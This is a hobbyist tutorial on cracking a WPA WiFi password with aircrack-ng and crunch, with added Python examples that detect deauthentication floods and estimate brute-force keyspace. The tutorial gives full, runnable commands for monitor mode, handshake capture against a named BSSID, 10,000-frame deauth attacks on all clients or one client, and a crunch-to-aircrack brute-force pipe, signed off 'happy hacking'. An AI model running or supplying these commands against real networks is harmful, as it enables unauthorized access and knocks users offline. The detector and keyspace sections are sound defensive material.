Today I will show you how to crack a wireless router using aircrack-ng and crunch.
First off, this is tested on my own home network, as I don't advise hacking anyone else's WiFi but your own.
First we need to put our wireless adaptor into monitor mode. Monitor mode, or RFMON mode, allows a computer with a wireless network interface controller to monitor all traffic received from the wireless network. Unlike promiscuous mode, which is also used for packet sniffing, monitor mode allows packets to be captured without having to associate with any access point or ad hoc network first.
Let's find out the name of your card. It will often be listed in Kali Linux as wlan0, or, if you are using a USB WiFi adaptor like me, you can use ifconfig to find out.
Now that we know the name of our wireless interface, we need to put our wireless card into monitor mode with airmon-ng start wlan1.
# airmon-ng start wlan1
Now the wireless interface wlan1 will be put into monitor mode. We can check whether our wireless interface is in monitor mode by using ifconfig.
As you see in the screenshot above, we now have a wireless interface called wlan1mon. This tells us that airmon-ng has successfully put our wireless card into monitor mode. Now we can use airodump-ng wlan1mon to find information about WiFi signals, such as the BSSID and the wireless channel the target wireless network is running on.
And the output.
For this tutorial I'm using CableComm-CamGet4. Once we have found a target wireless network we need to copy the BSSID of the network. Open a new terminal and type airodump-ng --bssid <the BSSID of the network> -c <the channel of the network, mine is channel 1> --write <an output file prefix, here the ESSID CableComm-CamGet4> wlan1mon. The ESSID is the target network's name. Your command should look like this: airodump-ng --bssid 00:23:BE:47:3C:93 -c1 --write CableComm-CamGet4 wlan1mon.
# airodump-ng --bssid 00:23:BE:47:3C:93 -c1 --write CableComm-CamGet4 wlan1mon
Now it's time to get the handshake; this is the fun part. I'm going to show you two different ways to do this.
The first one is:
aireplay-ng --deauth 10000 -a 00:23:BE:47:3C:93 wlan1mon for the main network, i.e. a broadcast deauth aimed at every client of that access point.
# aireplay-ng --deauth 10000 -a 00:23:BE:47:3C:93 wlan1mon
The second one is:
aireplay-ng --deauth 10000 -a 00:23:BE:47:3C:93 -c AC:22:0B:43:5B:D3 wlan1mon, where -c picks one specific client of the network.
# aireplay-ng --deauth 10000 -a 00:23:BE:47:3C:93 -c AC:22:0B:43:5B:D3 wlan1mon
Or you can do what I do and run the two attacks alongside each other.
Now we need to wait for the handshake from the client.
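The deauthentication frames sent above are exactly what the owner of a network would want to catch. Below is an added example, written for this edit and not part of the original post or of the aircrack-ng project: a small Python detector that reads decoded 802.11 management frames (timestamp, subtype, BSSID, destination) and raises one alert when a BSSID emits ten or more deauth/disassoc frames within one second. The line format, the sample frames (constructed inline for this example), the threshold, the window and the second access point address aa:bb:cc:dd:ee:ff are all assumptions; the BSSID and client MAC are the ones quoted in the post.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Detection settings (assumed values, not from the original post): a genuine
# deauth is rare, so ten or more from one BSSID inside one second is treated
# as a flood.
DEAUTH_THRESHOLD = 10
WINDOW = timedelta(seconds=1)


def build_sample():
    """Constructed sample of decoded 802.11 management frames, one per line:
    '<ISO timestamp> <subtype> <bssid> <destination>'. Not real capture data;
    the BSSID and client MAC are the ones quoted in the post."""
    base = datetime(2024, 1, 1, 10, 0, 0)
    ap, client = "00:23:be:47:3c:93", "ac:22:0b:43:5b:d3"
    bcast = "ff:ff:ff:ff:ff:ff"
    lines = []
    # normal beacons from the AP every 100 ms
    for i in range(5):
        t = base + timedelta(milliseconds=100 * i)
        lines.append(f"{t.isoformat(timespec='milliseconds')} beacon {ap} {bcast}")
    # one isolated deauth from a different (constructed) AP: not a flood
    t = base + timedelta(milliseconds=500)
    lines.append(f"{t.isoformat(timespec='milliseconds')} deauth aa:bb:cc:dd:ee:ff {bcast}")
    # a burst of 12 deauth frames in 600 ms, alternating between the broadcast
    # form and the single-client form shown in the post
    for i in range(12):
        t = base + timedelta(seconds=1, milliseconds=50 * i)
        dst = bcast if i % 2 == 0 else client
        lines.append(f"{t.isoformat(timespec='milliseconds')} deauth {ap} {dst}")
    return lines


def parse_frame(line):
    """Split one decoded frame line into (timestamp, subtype, bssid, destination)."""
    ts, subtype, bssid, dst = line.split()
    return datetime.fromisoformat(ts), subtype, bssid.lower(), dst.lower()


def detect_deauth_floods(lines, threshold=DEAUTH_THRESHOLD, window=WINDOW):
    """Return one alert per BSSID whose deauth/disassoc count reaches the
    threshold inside a sliding time window. Lines are expected in time order."""
    recent = defaultdict(deque)   # bssid -> (timestamp, destination) of recent frames
    alerts, alerted = [], set()
    for line in lines:
        if not line.strip():
            continue
        ts, subtype, bssid, dst = parse_frame(line)
        if subtype not in ("deauth", "disassoc"):
            continue
        q = recent[bssid]
        q.append((ts, dst))
        while ts - q[0][0] > window:   # drop frames that fell out of the window
            q.popleft()
        if len(q) >= threshold and bssid not in alerted:
            alerts.append({
                "bssid": bssid,
                "start": q[0][0],
                "count": len(q),
                "targets": sorted({d for _, d in q}),
            })
            alerted.add(bssid)
    return alerts


if __name__ == "__main__":
    for a in detect_deauth_floods(build_sample()):
        print(f"deauth flood from {a['bssid']} at {a['start']}: "
              f"{a['count']} frames, targets {a['targets']}")
```

Run it directly to print the single alert for the burst; the lone deauth from the other AP stays quiet. The real fix is protected management frames (802.11w/PMF) on access points and clients that support them, because an AP that authenticates its deauth frames leaves spoofed ones to be discarded; a detector like this one covers the networks that cannot turn that on yet.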
Now here comes the fun part, mostly for those with small hard drives that don't have the space for word-lists. We can use the following command if we don't have any word-lists.
# crunch 4 20 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 | aircrack-ng CableComm-CamGet4-02.cap -e CableComm-CamGet4 -w -
Piping crunch into aircrack-ng can save you the time (and disk space) of generating and storing word-lists.
Now it's time to open the cap file and crack the password. Let aircrack-ng run and there ya go. Crunch can be piped into a number of tools like hashcat and John the Ripper, most of the brute-force tools on Kali or Parrot.
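What the crunch pipeline above actually buys you is best seen by counting. The following is an added example, not from the post, from crunch or from aircrack-ng: Python that computes the exact number of candidates crunch emits for the 62-character set and the 4..20 length range, the time needed to exhaust them at an assumed guess rate, and whether a given passphrase is even inside that search space. The guess rate of 100,000 per second and the sample passphrases are assumptions; the 8..63 length limit is the one the WPA/WPA2 standard puts on passphrases, so the 4..7 part of the range can never match a real network key.

```python
import string

# The 62-symbol set and 4..20 length range from the crunch command above
CRUNCH_CHARSET = string.ascii_lowercase + string.ascii_uppercase + string.digits
CRUNCH_MIN_LEN, CRUNCH_MAX_LEN = 4, 20
# Passphrase length limits from the WPA/WPA2 standard (IEEE 802.11i)
WPA_MIN_LEN, WPA_MAX_LEN = 8, 63
SECONDS_PER_YEAR = 365 * 24 * 3600


def keyspace(charset_size, min_len, max_len):
    """Exact number of candidates an exhaustive generator emits for lengths
    min_len..max_len over a charset of the given size."""
    return sum(charset_size ** n for n in range(min_len, max_len + 1))


def years_to_exhaust(candidates, rate_per_second):
    """Wall-clock years to try every candidate at a sustained guess rate."""
    return candidates / rate_per_second / SECONDS_PER_YEAR


def is_valid_wpa_passphrase(passphrase):
    """Length 8..63 and printable ASCII, as the standard requires."""
    return (WPA_MIN_LEN <= len(passphrase) <= WPA_MAX_LEN
            and all(32 <= ord(c) <= 126 for c in passphrase))


def in_search_space(passphrase, charset=CRUNCH_CHARSET,
                    min_len=CRUNCH_MIN_LEN, max_len=CRUNCH_MAX_LEN):
    """True if this crunch invocation would eventually emit the passphrase.
    Anything with a character outside the charset, or longer than max_len,
    is never produced no matter how long the pipeline runs."""
    return min_len <= len(passphrase) <= max_len and all(c in charset for c in passphrase)


def assess(passphrase, rate_per_second=100_000):
    """Summarise how the crunch pipeline relates to one passphrase. The guess
    rate is an assumed figure for illustration, not a measured one."""
    total = keyspace(len(CRUNCH_CHARSET), CRUNCH_MIN_LEN, CRUNCH_MAX_LEN)
    return {
        "valid_wpa": is_valid_wpa_passphrase(passphrase),
        "reachable": in_search_space(passphrase),
        "candidates": total,
        "years_to_exhaust": years_to_exhaust(total, rate_per_second),
    }


if __name__ == "__main__":
    # constructed sample passphrases: one inside the enumerated set, one outside it
    for p in ("Passw0rd", "correct horse battery staple"):
        r = assess(p)
        print(f"{p!r}: valid WPA={r['valid_wpa']}, reachable by crunch={r['reachable']}, "
              f"{r['candidates']:.3e} candidates, {r['years_to_exhaust']:.3e} years to exhaust")
```

Run it to see that a passphrase containing a space or punctuation, or longer than 20 characters, is never produced by this invocation however long it runs, and that even the reachable set takes far longer than any hardware lifetime at the assumed rate. Length and a character set wider than letters and digits are the defender's lever here.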
Have fun lads and happy hacking.